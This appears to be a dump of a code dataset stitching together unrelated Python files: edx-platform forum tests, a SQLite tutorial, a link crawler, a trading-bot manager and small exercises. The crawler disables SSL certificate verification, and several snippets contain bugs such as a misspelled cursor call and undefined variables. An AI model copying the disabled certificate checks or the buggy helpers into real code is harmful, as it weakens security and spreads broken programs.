pylint: disable=missing-class-docstring\n\n @classmethod\n def setUpClass(cls):\n # pylint: disable=super-method-not-called\n with super().setUpClassAndTestData():\n cls.course = CourseFactory.create()\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n cls.student = UserFactory.create()\n CourseEnrollmentFactory(user=cls.student, course_id=cls.course.id)\n\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def _test_unicode_data(self, text, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text)\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n # so (request.headers.get('x-requested-with') == 'XMLHttpRequest') == True\n request.META[\"HTTP_X_REQUESTED_WITH\"] = \"XMLHttpRequest\"\n\n response = views.followed_threads(request, str(self.course.id), str(self.student.id))\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['discussion_data'][0]['title'] == text\n assert response_data['discussion_data'][0]['body'] == text\n\n\nclass EnrollmentTestCase(ForumsEnableMixin, ModuleStoreTestCase):\n \"\"\"\n Tests for the behavior of views depending on if the student is enrolled\n in the course\n \"\"\"\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n super().setUp()\n self.course = CourseFactory.create()\n self.student = UserFactory.create()\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def test_unenrolled(self, mock_request):\n mock_request.side_effect = make_mock_request_impl(course=self.course, text='dummy')\n request = RequestFactory().get('dummy_url')\n request.user = self.student\n with pytest.raises(CourseAccessRedirect):\n views.forum_form_discussion(request, course_id=str(self.course.id)) # pylint: disable=no-value-for-parameter, unexpected-keyword-arg\n\n\n@patch('requests.request', autospec=True)\nclass EnterpriseConsentTestCase(EnterpriseTestConsentRequired, ForumsEnableMixin, UrlResetMixin, ModuleStoreTestCase):\n \"\"\"\n Ensure that the Enterprise Data Consent redirects are in place only when consent is required.\n \"\"\"\n CREATE_USER = False\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n # Invoke UrlResetMixin setUp\n super().setUp()\n\n username = \"foo\"\n password = \"bar\"\n\n self.discussion_id = 'dummy_discussion_id'\n self.course = CourseFactory.create(discussion_topics={'dummy discussion': {'id': self.discussion_id}})\n self.student = UserFactory.create(username=username, password=password)\n CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)\n assert self.client.login(username=username, password=password)\n\n self.addCleanup(translation.deactivate)\n\n @patch('openedx.features.enterprise_support.api.enterprise_customer_for_request')\n def test_consent_required(self, mock_enterprise_customer_for_request, mock_request):\n \"\"\"\n Test that enterprise data sharing consent is required when enabled for the various discussion views.\n \"\"\"\n # ENT-924: Temporary solution to replace sensitive SSO usernames.\n mock_enterprise_customer_for_request.return_value = None\n\n thread_id = 'dummy'\n course_id = str(self.course.id)\n mock_request.side_effect = make_mock_request_impl(course=self.course, text='dummy', thread_id=thread_id)\n\n for url in (\n reverse('forum_form_discussion',\n kwargs=dict(course_id=course_id)),\n reverse('single_thread',\n kwargs=dict(course_id=course_id, discussion_id=self.discussion_id, thread_id=thread_id)),\n ):\n self.verify_consent_required(self.client, url) # pylint: disable=no-value-for-parameter\n\n\nclass DividedDiscussionsTestCase(CohortViewsTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n def create_divided_discussions(self):\n \"\"\"\n Set up a divided discussion in the system, complete with all the fixings\n \"\"\"\n divided_inline_discussions = ['Topic A']\n divided_course_wide_discussions = [\"Topic B\"]\n divided_discussions = divided_inline_discussions + divided_course_wide_discussions\n\n # inline discussion\n BlockFactory.create(\n parent_location=self.course.location,\n category=\"discussion\",\n discussion_id=topic_name_to_id(self.course, \"Topic A\"),\n discussion_category=\"Chapter\",\n discussion_target=\"Discussion\",\n start=datetime.now()\n )\n # get updated course\n self.course = self.store.get_item(self.course.location)\n # course-wide discussion\n discussion_topics = {\n \"Topic B\": {\"id\": \"Topic B\"},\n }\n\n config_course_cohorts(\n self.course,\n is_cohorted=True,\n )\n\n config_course_discussions(\n self.course,\n discussion_topics=discussion_topics,\n divided_discussions=divided_discussions\n )\n return divided_inline_discussions, divided_course_wide_discussions\n\n\nclass CourseDiscussionTopicsTestCase(DividedDiscussionsTestCase):\n \"\"\"\n Tests the `divide_discussion_topics` view.\n \"\"\"\n MODULESTORE = TEST_DATA_SPLIT_MODULESTORE\n\n def test_non_staff(self):\n \"\"\"\n Verify that we cannot access divide_discussion_topics if we're a non-staff user.\n \"\"\"\n self._verify_non_staff_cannot_access(views.discussion_topics, \"GET\", [str(self.course.id)])\n\n def test_get_discussion_topics(self):\n \"\"\"\n Verify that discussion_topics is working for HTTP GET.\n \"\"\"\n # create inline & course-wide discussion to verify the different map.\n self.create_divided_discussions()\n\n response = self.get_handler(self.course, handler=views.discussion_topics)\n start_date = response['inline_discussions']['subcategories']['Chapter']['start_date']\n expected_response = {\n \"course_wide_discussions\": {\n 'children': [['Topic B', TYPE_ENTRY]],\n 'entries': {\n 'Topic B': {\n 'sort_key': 'A',\n 'is_divided': True,\n 'id': topic_name_to_id(self.course, \"Topic B\"),\n 'start_date': response['course_wide_discussions']['entries']['Topic B']['start_date']\n }\n }\n },\n \"inline_discussions\": {\n 'subcategories': {\n 'Chapter': {\n 'subcategories': {},\n 'children': [['Discussion', TYPE_ENTRY]],\n 'entries': {\n 'Discussion': {\n 'sort_key': None,\n 'is_divided': True,\n 'id': topic_name_to_id(self.course, \"Topic A\"),\n 'start_date': start_date\n }\n },\n 'sort_key': 'Chapter',\n 'start_date': start_date\n }\n },\n 'children': [['Chapter', TYPE_SUBCATEGORY]]\n }\n }\n assert response == expected_response\n\n\nclass CourseDiscussionsHandlerTestCase(DividedDiscussionsTestCase):\n \"\"\"\n Tests the course_discussion_settings_handler\n \"\"\"\n MODULESTORE = TEST_DATA_SPLIT_MODULESTORE\n\n def get_expected_response(self):\n \"\"\"\n Returns the static response dict.\n \"\"\"\n return {\n 'always_divide_inline_discussions': False,\n 'divided_inline_discussions': [],\n 'divided_course_wide_discussions': [],\n 'id': 1,\n 'division_scheme': 'cohort',\n 'available_division_schemes': ['cohort']\n }\n\n def test_non_staff(self):\n \"\"\"\n Verify that we cannot access course_discussions_settings_handler if we're a non-staff user.\n \"\"\"\n self._verify_non_staff_cannot_access(\n course_discussions_settings_handler, \"GET\", [str(self.course.id)]\n )\n self._verify_non_staff_cannot_access(\n course_discussions_settings_handler, \"PATCH\", [str(self.course.id)]\n )\n\n def test_update_always_divide_inline_discussion_settings(self):\n \"\"\"\n Verify that course_discussions_settings_handler is working for always_divide_inline_discussions via HTTP PATCH.\n \"\"\"\n config_course_cohorts(self.course, is_cohorted=True)\n\n response = self.get_handler(self.course, handler=course_discussions_settings_handler)\n\n expected_response = self.get_expected_response()\n\n assert response == expected_response\n\n expected_response['always_divide_inline_discussions'] = True\n response = self.patch_handler(\n self.course, data=expected_response, handler=course_discussions_settings_handler\n )\n\n assert response == expected_response\n\n def test_update_course_wide_discussion_settings(self):\n \"\"\"\n Verify that course_discussions_settings_handler is working for divided_course_wide_discussions via HTTP PATCH.\n \"\"\"\n # course-wide discussion\n discussion_topics = {\n \"Topic B\": {\"id\": \"Topic B\"},\n }\n\n config_course_cohorts(self.course, is_cohorted=True)\n config_course_discussions(self.course, discussion_topics=discussion_topics)\n\n response = self.get_handler(self.course, handler=views.course_discussions_settings_handler)\n\n expected_response = self.get_expected_response()\n assert response == expected_response\n\n expected_response['divided_course_wide_discussions'] = [topic_name_to_id(self.course, \"Topic B\")]\n response = self.patch_handler(\n self.course, data=expected_response, handler=views.course_discussions_settings_handler\n )\n\n assert response == expected_response\n\n def test_update_inline_discussion_settings(self):\n \"\"\"\n Verify that course_discussions_settings_handler is working for divided_inline_discussions via HTTP PATCH.\n \"\"\"\n config_course_cohorts(self.course, is_cohorted=True)\n\n response = self.get_handler(self.course, handler=views.course_discussions_settings_handler)\n\n expected_response = self.get_expected_response()\n assert response == expected_response\n\n RequestCache.clear_all_namespaces()\n now = datetime.now()\n # inline discussion\n BlockFactory.create(\n parent_location=self.course.location,\n category=\"discussion\",\n discussion_id=\"Topic_A\",\n discussion_category=\"Chapter\",\n discussion_target=\"Discussion\",\n start=now\n )\n\n expected_response['divided_inline_discussions'] = [\"Topic_A\"]\n response = self.patch_handler(\n self.course, data=expected_response, handler=views.course_discussions_settings_handler\n )\n\n assert response == expected_response\n\n def test_get_settings(self):\n \"\"\"\n Verify that course_discussions_settings_handler is working for HTTP GET.\n \"\"\"\n divided_inline_discussions, divided_course_wide_discussions = self.create_divided_discussions()\n\n response = self.get_handler(self.course, handler=views.course_discussions_settings_handler)\n expected_response = self.get_expected_response()\n\n expected_response['divided_inline_discussions'] = [topic_name_to_id(self.course, name)\n for name in divided_inline_discussions]\n expected_response['divided_course_wide_discussions'] = [topic_name_to_id(self.course, name)\n for name in divided_course_wide_discussions]\n\n assert response == expected_response\n\n def test_update_settings_with_invalid_field_data_type(self):\n \"\"\"\n Verify that course_discussions_settings_handler return HTTP 400 if field data type is incorrect.\n \"\"\"\n config_course_cohorts(self.course, is_cohorted=True)\n\n response = self.patch_handler(\n self.course,\n data={'always_divide_inline_discussions': ''},\n expected_response_code=400,\n handler=views.course_discussions_settings_handler\n )\n assert 'Incorrect field type for `{}`. Type must be `{}`'.format(\n 'always_divide_inline_discussions',\n bool.__name__\n ) == response.get('error')\n\n def test_available_schemes(self):\n # Cohorts disabled, single enrollment mode.\n config_course_cohorts(self.course, is_cohorted=False)\n response = self.get_handler(self.course, handler=views.course_discussions_settings_handler)\n expected_response = self.get_expected_response()\n expected_response['available_division_schemes'] = []\n assert response == expected_response\n\n # Add 2 enrollment modes\n CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.AUDIT)\n CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.VERIFIED)\n response = self.get_handler(self.course, handler=views.course_discussions_settings_handler)\n expected_response['available_division_schemes'] = [CourseDiscussionSettings.ENROLLMENT_TRACK]\n assert response == expected_response\n\n # Enable cohorts\n config_course_cohorts(self.course, is_cohorted=True)\n response = self.get_handler(self.course, handler=views.course_discussions_settings_handler)\n expected_response['available_division_schemes'] = [\n CourseDiscussionSettings.COHORT, CourseDiscussionSettings.ENROLLMENT_TRACK\n ]\n assert response == expected_response\n\n\nclass DefaultTopicIdGetterTestCase(ModuleStoreTestCase):\n \"\"\"\n Tests the `_get_discussion_default_topic_id` helper.\n \"\"\"\n\n def test_no_default_topic(self):\n discussion_topics = {\n 'dummy discussion': {\n 'id': 'dummy_discussion_id',\n },\n }\n course = CourseFactory.create(discussion_topics=discussion_topics)\n expected_id = None\n result = _get_discussion_default_topic_id(course)\n assert expected_id == result\n\n def test_default_topic_id(self):\n discussion_topics = {\n 'dummy discussion': {\n 'id': 'dummy_discussion_id',\n },\n 'another discussion': {\n 'id': 'another_discussion_id',\n 'default': True,\n },\n }\n course = CourseFactory.create(discussion_topics=discussion_topics)\n expected_id = 'another_discussion_id'\n result = _get_discussion_default_topic_id(course)\n assert expected_id == result\n\n\nclass ThreadViewedEventTestCase(EventTestMixin, ForumsEnableMixin, UrlResetMixin, ModuleStoreTestCase):\n \"\"\"\n Forum thread views are expected to launch analytics events. Test these here.\n \"\"\"\n\n CATEGORY_ID = 'i4x-edx-discussion-id'\n CATEGORY_NAME = 'Discussion 1'\n PARENT_CATEGORY_NAME = 'Chapter 1'\n\n DUMMY_THREAD_ID = 'dummythreadids'\n DUMMY_TITLE = 'Dummy title'\n DUMMY_URL = 'https://example.com/dummy/url/'\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self): # pylint: disable=arguments-differ\n super().setUp('lms.djangoapps.discussion.django_comment_client.base.views.tracker')\n\n self.course = CourseFactory.create(\n teams_configuration=TeamsConfig({\n 'topics': [{\n 'id': 'arbitrary-topic-id',\n 'name': 'arbitrary-topic-name',\n 'description': 'arbitrary-topic-desc'\n }]\n })\n )\n seed_permissions_roles(self.course.id)\n\n PASSWORD = 'test'\n self.student = UserFactory.create(password=PASSWORD)\n CourseEnrollmentFactory(user=self.student, course_id=self.course.id)\n\n self.staff = UserFactory.create(is_staff=True)\n UserBasedRole(user=self.staff, role=CourseStaffRole.ROLE).add_course(self.course.id)\n\n self.category = BlockFactory.create(\n parent_location=self.course.location,\n category='discussion',\n discussion_id=self.CATEGORY_ID,\n discussion_category=self.PARENT_CATEGORY_NAME,\n discussion_target=self.CATEGORY_NAME,\n )\n self.team = CourseTeamFactory.create(\n name='Team 1',\n course_id=self.course.id,\n topic_id='arbitrary-topic-id',\n discussion_topic_id=self.category.discussion_id,\n )\n CourseTeamMembershipFactory.create(team=self.team, user=self.student)\n self.client.login(username=self.student.username, password=PASSWORD)\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.perform_request')\n def test_thread_viewed_event(self, mock_perform_request):\n mock_perform_request.side_effect = make_mock_perform_request_impl(\n course=self.course,\n text=self.DUMMY_TITLE,\n thread_id=self.DUMMY_THREAD_ID,\n commentable_id=self.category.discussion_id,\n )\n url = '/courses/{}/discussion/forum/{}/threads/{}'.format(\n str(self.course.id),\n self.category.discussion_id,\n self.DUMMY_THREAD_ID\n )\n self.client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n\n expected_event = {\n 'id': self.DUMMY_THREAD_ID,\n 'title': self.DUMMY_TITLE,\n 'commentable_id': self.category.discussion_id,\n 'category_id': self.category.discussion_id,\n 'category_name': self.category.discussion_target,\n 'user_forums_roles': [FORUM_ROLE_STUDENT],\n 'user_course_roles': [],\n 'target_username': self.student.username,\n 'team_id': self.team.id,\n 'url': self.DUMMY_URL,\n }\n expected_event_items = list(expected_event.items())\n\n self.assert_event_emission_count('edx.forum.thread.viewed', 1)\n _, event = self.get_latest_call_args()\n event_items = list(event.items())\n assert ((kv_pair in event_items) for kv_pair in expected_event_items)\n\n\n@ddt.ddt\n@patch(\n 'openedx.core.djangoapps.django_comment_common.comment_client.utils.perform_request',\n Mock(\n return_value={\n \"id\": \"test_thread\",\n \"title\": \"Title\",\n \"body\": \"

    \",\n \"default_sort_key\": \"date\",\n \"upvoted_ids\": [],\n \"downvoted_ids\": [],\n \"subscribed_thread_ids\": [],\n }\n )\n)\nclass ForumMFETestCase(ForumsEnableMixin, SharedModuleStoreTestCase):\n \"\"\"\n Tests that the MFE upgrade banner and MFE is shown in the correct situation with the correct UI\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.course = CourseFactory.create()\n self.user = UserFactory.create()\n self.staff_user = AdminFactory.create()\n CourseEnrollmentFactory.create(user=self.user, course_id=self.course.id)\n\n @override_settings(DISCUSSIONS_MICROFRONTEND_URL=\"http://test.url\")\n def test_redirect_from_legacy_base_url_to_new_experience(self):\n \"\"\"\n Verify that the legacy url is redirected to MFE homepage when\n ENABLE_DISCUSSIONS_MFE flag is enabled.\n \"\"\"\n\n with override_waffle_flag(ENABLE_DISCUSSIONS_MFE, True):\n self.client.login(username=self.user.username, password=self.TEST_PASSWORD)\n url = reverse(\"forum_form_discussion\", args=[self.course.id])\n response = self.client.get(url)\n assert response.status_code == 302\n expected_url = f\"{settings.DISCUSSIONS_MICROFRONTEND_URL}/{str(self.course.id)}\"\n assert response.url == expected_url\n\n @override_settings(DISCUSSIONS_MICROFRONTEND_URL=\"http://test.url\")\n def test_redirect_from_legacy_profile_url_to_new_experience(self):\n \"\"\"\n Verify that the requested user profile is redirected to MFE learners tab when\n ENABLE_DISCUSSIONS_MFE flag is enabled\n \"\"\"\n\n with override_waffle_flag(ENABLE_DISCUSSIONS_MFE, True):\n self.client.login(username=self.user.username, password=self.TEST_PASSWORD)\n url = reverse(\"user_profile\", args=[self.course.id, self.user.id])\n response = self.client.get(url)\n assert response.status_code == 302\n expected_url = f\"{settings.DISCUSSIONS_MICROFRONTEND_URL}/{str(self.course.id)}/learners\"\n assert response.url == expected_url\n\n @override_settings(DISCUSSIONS_MICROFRONTEND_URL=\"http://test.url\")\n def test_redirect_from_legacy_single_thread_to_new_experience(self):\n \"\"\"\n Verify that a legacy single url is redirected to corresponding MFE thread url when the ENABLE_DISCUSSIONS_MFE\n flag is enabled\n \"\"\"\n\n with override_waffle_flag(ENABLE_DISCUSSIONS_MFE, True):\n self.client.login(username=self.user.username, password=self.TEST_PASSWORD)\n url = reverse(\"single_thread\", args=[self.course.id, \"test_discussion\", \"test_thread\"])\n response = self.client.get(url)\n assert response.status_code == 302\n expected_url = f\"{settings.DISCUSSIONS_MICROFRONTEND_URL}/{str(self.course.id)}/posts/test_thread\"\n assert response.url == expected_url\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/discussion/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":95585,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"74188039120","text":"# http://www.sqlitetutorial.net/sqlite-python/\n\n# to view this database, go to C:\\data\\db and run `sqlite3 pythonsqlite.db`\n\nimport sqlite3\n\nsql_cmd = { \"create_table\": {\n \"projects\": \"\"\"CREATE TABLE IF NOT EXISTS projects (\n id integer PRIMARY KEY,\n name text NOT NULL,\n begin_date text,\n end_date text\n ); \"\"\",\n \"tasks\": \"\"\"CREATE TABLE IF NOT EXISTS tasks (\n id integer PRIMARY KEY,\n name text NOT NULL,\n priority integer,\n status_id integer NOT NULL,\n project_id integer NOT NULL,\n begin_date text NOT NULL,\n end_date text NOT NULL,\n FOREIGN KEY (project_id) REFERENCES projects (id)\n );\"\"\" } ,\n \"insert_row\": {\n \"projects\": ''' INSERT INTO projects(name, begin_date, end_date) VALUES(?,?,?) ''',\n \"tasks\": ''' INSERT INTO tasks(name, priority, status_id, project_id, begin_date, end_date) VALUES(?,?,?,?,?,?) '''}\n }\n\ndef create_connection(db_file=None):\n if db_file is None:\n db_file = ':memory:'\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except sqlite3.Error as e:\n print(e)\n\ndef create_table(conn, table):\n sql = sql_cmd[\"create_table\"][table]\n try:\n c = conn.cursor()\n c.execute(sql)\n except sqlite3.Error as e:\n print(e)\n\n# \"Row\" is a tuple\ndef insert_row(conn, row, table):\n sql = sql_cmd[\"insert_row\"][table]\n cur = conn.cursor()\n cur.execute(sql, row) # row's values replace the '?'s in sql\n return cur.lastrowid\n\ndef delete_row(conn, row, table):\n sql = 'DELETE FROM ' + table + ' WHERE id=?'\n cur = conn.curosr()\n cur.execute(sql, (id,))\n\ndef delete_all_rows(conn, row, table):\n sql = 'DELETE FROM ' + table\n cur = conn.curosr()\n cur.execute(sql)\n\ndef update_rows(conn, update_params, table):\n sql = ''' UPDATE tasks\n SET priority = ? ,\n begin_date = ? ,\n end_date = ?\n WHERE id = ?'''\n cur = conn.cursor()\n cur.execute(sql, update_params)\n\ndef view_table(conn, table):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM \" + table)\n for row in cur.fetchall():\n print(row)\n\nif __name__ == '__main__':\n conn = create_connection(\"C:\\\\data\\db\\pythonsqlite.db\")\n \n create_table(conn, \"projects\")\n create_table(conn, \"tasks\")\n \n project = ('Cool App with SQLite & Python', '2015-01-01', '2015-01-30');\n project_id = insert_row(conn, project, \"projects\")\n\n task_1 = ('Analyze the requirements of the app', 1, 1, project_id, '2015-01-01', '2015-01-02')\n task_2 = ('Confirm with user about the top requirements', 1, 1, project_id, '2015-01-03', '2015-01-05')\n insert_row(conn, task_1, \"tasks\")\n insert_row(conn, task_2, \"tasks\")\n\n update_rows(conn, (2, '2015-01-04', '2015-01-06',2), \"tasks\")\n\n view_table(conn, \"tasks\")\n \n conn.close()","repo_name":"shuklak13/Python-Notes","sub_path":"Tools/sqlite_ex.py","file_name":"sqlite_ex.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20177765964","text":"#!/usr/bin/env python\n \nimport sys\nimport time\nfrom alignment import *\n\nlogs = sys.stderr\n\ndef usage():\n\tprint >> logs, \"cat align-union | ~/newcode/split_alignment.py [--GIZA] [--inv] file1 file2\"\n\tprint >> logs, \"\\t-G, --GIZA\\t use GIZA format: 4 5 instead of 4-5\"\n\tsys.exit(1)\n\ngiza = False\n\ndef getopts():\n\tglobal giza, norm_file, invr_file\n\timport getopt\n\ttry:\n\t\topts, args = getopt.getopt(sys.argv[1:], \"G\", [\"GIZA\", \"inv\"])\n\texcept:\n\t\tusage()\n\tfor o, a in opts:\n\t\tif o == \"--GIZA\":\n\t\t\tgiza = True\n\t\telif o == \"--inv\":\n\t\t\tset_inverse(True)\n\t\telse:\n\t\t\tusage()\n\n\tif len(args) == 2:\n\t\tnorm_file, invr_file = open(args[0], \"w\"), open(args[1], \"w\")\n\telse:\n\t\tusage()\n\t\t\ndef main():\n\tfor i, line in enumerate(sys.stdin): # don't zip: not lazy\n\n\t\tif (i+1) % 10000 == 0:\n\t\t\tprint >> logs, i+1, \"lines processed\"\n\n\t\tpoints = get_two_alignments(line, i)\n\n\t\tprint_alignment(points[0], norm_file, giza, cr=None, pr=None)\n\t\tprint_alignment(points[1], invr_file, giza, cr=swap, pr=None)\t\t\n\t\t\nif __name__ == \"__main__\":\n\ttry:\n\t\timport psyco\n\t\tpsyco.full()\n\texcept:\n\t\tpass\n\tgetopts()\n\tmain()\n","repo_name":"fascal/alignment","sub_path":"split_alignment.py","file_name":"split_alignment.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14957455053","text":"from itertools import combinations\n\ndef solution(numbers):\n lists = list(combinations(numbers,2)) #n개 중 2개를 뽑는 경우의 수 \n answer = []\n for i in range(len(lists)):\n sum = lists[i][0]+lists[i][1]\n answer.append(sum)\n answer = list(sorted(set(answer)))\n return answer\n","repo_name":"threegenie/Programmers_Algorithm","sub_path":"Level 1/두 개 뽑아서 더하기.py","file_name":"두 개 뽑아서 더하기.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"20298923562","text":"import urllib.request, urllib.parse, urllib.error\r\nfrom bs4 import BeautifulSoup\r\nimport ssl\r\nimport socket\r\n\r\n# Ignore SSL certificate errors\r\ndef findLinks(url):\r\n if url[-1] != \"/\":\r\n url = url + \"/\"\r\n ctx = ssl.create_default_context()\r\n ctx.check_hostname = False\r\n ctx.verify_mode = ssl.CERT_NONE\r\n\r\n#url = input('Enter - ')\r\n html = urllib.request.urlopen(url, context=ctx).read()\r\n soup = BeautifulSoup(html, 'html.parser')\r\n\r\n # Retrieve all of the anchor tags\r\n tags = soup('a')\r\n linkedTo = []\r\n for tag in tags:\r\n lurl = tag.get(\"href\", \"\")\r\n #print(lurl)\r\n if len(lurl)>3:\r\n if lurl[:4] == \"http\":\r\n linkedTo.append(lurl)\r\n elif lurl[0] != \"#\":\r\n if lurl[0] != \"/\":\r\n linkedTo.append(url + lurl)\r\n else:\r\n linkedTo.append(url + lurl[1:])\r\n## for l in linkedTo:\r\n## print(l)\r\n return linkedTo\r\n \r\n\r\ndef extensibleFL(urls):\r\n r = []\r\n for url in urls:\r\n #print(url)\r\n try:\r\n r = r + findLinks(url)\r\n except urllib.error.HTTPError:\r\n #print(\"URLLib HTTPError on, \", url)\r\n print()\r\n except socket.gaierror:\r\n print(\"Socket GAIError on, \", url)\r\n \r\n r = list(set(r))\r\n return r\r\n\r\nefl = extensibleFL\r\n\r\ndef findWithin(url, md=3):\r\n r = []\r\n for d in range(1, md + 1):\r\n r = r + eval(\"efl(\"*d + \"['\" + url + \"']\" + \")\"*d)\r\n r = list(set(r))\r\n return r\r\nfw = findWithin\r\n\r\nurl = input(\"URL?: \")\r\nd = int(input(\"Distance?: \"))\r\ntwoAway = fw(url, d)\r\nfor l in twoAway:\r\n print(l)\r\n","repo_name":"CodinguyAM/Miscellaneous","sub_path":"bs4 urllinks.py","file_name":"bs4 urllinks.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13503851753","text":"#! /usr/bin/python\n\nsubstr = \"\"\nlong = \"\"\nfor i in range(len(s)):\n if len(long) > 0:\n if long[-1] <= s[i]:\n long += s[i]\n else:\n long = s[i]\n else:\n long = s[i]\n if len(long) > len(substr):\n substr = long\nprint('Longest substring is alphabetical order is: ' + str(substr))\n\n\n","repo_name":"craigderington/mit-intro-comp-science-python","sub_path":"week1/week1_problem3.py","file_name":"week1_problem3.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42139622602","text":"import pymongo\nimport numpy as np\nfrom flask import Flask\nimport requests\nimport json\nimport math\nimport datetime\n\nfrom stock_manager.stock import Stock\n\ndef mapper(x):\n return np.average(x[\"predictions\"])\n\nclass Manager:\n eth_per_stock = 0.1\n\n def __init__(self, global_config, currency_config, db, data_distributor):\n self.stocks = []\n self.global_config = global_config\n self.currency_config = currency_config\n self.db = db\n self.data_distributor = data_distributor\n wallet = self.db.get(\"manager\", \"wallet\").find({\"type\": \"eth\"})\n if wallet.count() == 0:\n self.wallet = 2.0 \n self.db.get(\"manager\", \"wallet\").insert_one({\n \"type\": \"eth\",\n \"quantity\": self.wallet\n })\n else:\n self.wallet = float(wallet[0][\"quantity\"])\n\n def buy(self, currency):\n active_stocks = self.db.get(\"manager\", \"stocks\").find({\"sell\": None})\n if active_stocks.count() >= 20:\n return \"full\"\n\n currency_stocks = self.db.get(\"manager\", \"stocks\").find({\"symbol\": currency})\n if currency_stocks.count() > 0:\n return \"slot filled\"\n\n price = self.data_distributor.provider.get_average_price(currency)\n quantity = float(self.eth_per_stock) / price\n if self.wallet < price * quantity:\n return \"not enough funds\"\n \n self.wallet -= price * quantity\n self.update_wallet()\n stock = self.buy_stock(currency, quantity, price)\n self.db.get(\"manager\", \"stocks\").insert_one(stock)\n\n return \"OK\"\n\n def sell(self, currency):\n stocks = self.db.get(\"manager\", \"stocks\").find({\"sell\": None})\n sold = 0\n for stock in stocks:\n if stock[\"symbol\"] == currency:\n result = self.db.get(\"manager\", \"stocks\").delete_one(stock)\n price = self.data_distributor.provider.get_average_price(currency)\n self.wallet += price * stock[\"quantity\"]\n self.update_wallet()\n self.sell_stock(stock, price)\n self.db.get(\"manager\", \"stocks\").insert_one(stock)\n sold += result.deleted_count\n return str(sold)\n\n def get_worth(self):\n stocks = self.db.get(\"manager\", \"stocks\").find({\"sell\": None})\n worth = 0\n for stock in stocks:\n price = self.data_distributor.provider.get_average_price(stock[\"symbol\"])\n worth += price * stock[\"quantity\"]\n return worth + self.wallet\n\n def get_stocks_active(self):\n stocks = self.db.get(\"manager\", \"stocks\").find({\"sell\": None})\n stocks_list = []\n for stock in stocks:\n s = {\n \"symbol\": stock[\"symbol\"],\n \"quantity\": stock[\"quantity\"],\n \"buy_price\": stock[\"buy\"][\"price\"]\n }\n stocks_list.append(s)\n return json.dumps(stocks_list)\n\n def get_stocks_history(self):\n stocks = self.db.get(\"manager\", \"stocks\").find()\n for stock in stocks:\n del stock[\"id\"]\n return json.dumps(stocks)\n\n def sell_stock(self, stock, price):\n stock[\"sell\"] = {\n \"price\": price * self.global_config[\"binance\"][\"loss\"],\n \"timestamp\": int(datetime.datetime.now().timestamp())\n }\n\n def buy_stock(self, symbol, quantity, price):\n return {\n \"symbol\": symbol,\n \"quantity\": quantity * self.global_config[\"binance\"][\"loss\"],\n \"buy\": {\n \"price\": price,\n \"timestamp\": int(datetime.datetime.now().timestamp())\n },\n \"sell\": None\n }\n def update_wallet(self):\n self.db.get(\"manager\", \"wallet\").find_one_and_update({'type': 'eth'}, {'$set': {'quantity': self.wallet}})\n ","repo_name":"iv-p/ceres","sub_path":"stock_manager/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23834495565","text":"\"\"\"\nThe ref_available tests verify that all of the panes, layouts, and widgets defined by panel are\nrepresented in the reference gallery.\n\nThe doc_available tests check that python in markdown files can be run top to bottom.\n\n\"\"\"\nimport ast\nimport runpy\n\nfrom inspect import isclass\nfrom pathlib import Path\n\nimport pytest\n\nimport panel as pn\n\npytestmark = pytest.mark.docs\n\nREF_PATH = Path(__file__).parents[2] / \"examples\" / \"reference\"\nref_available = pytest.mark.skipif(not REF_PATH.is_dir(), reason=\"folder 'examples/reference' not found\")\n\nDOC_PATH = Path(__file__).parents[2] / \"doc\"\nIGNORED = ['vtk']\ndoc_files = [df for df in sorted(DOC_PATH.rglob(\"*.md\")) if not any(ig in str(df).lower() for ig in IGNORED)]\ndoc_available = pytest.mark.skipif(not DOC_PATH.is_dir(), reason=\"folder 'doc' not found\")\n\n\n@ref_available\ndef test_layouts_are_in_reference_gallery():\n exceptions = {\"ListPanel\", \"Panel\"}\n docs = {f.with_suffix(\"\").name for f in (REF_PATH / \"layouts\").iterdir()}\n\n def is_panel_layout(attr):\n layout = getattr(pn.layout, attr)\n return isclass(layout) and issubclass(layout, pn.layout.Panel)\n\n layouts = set(filter(is_panel_layout, dir(pn.layout)))\n 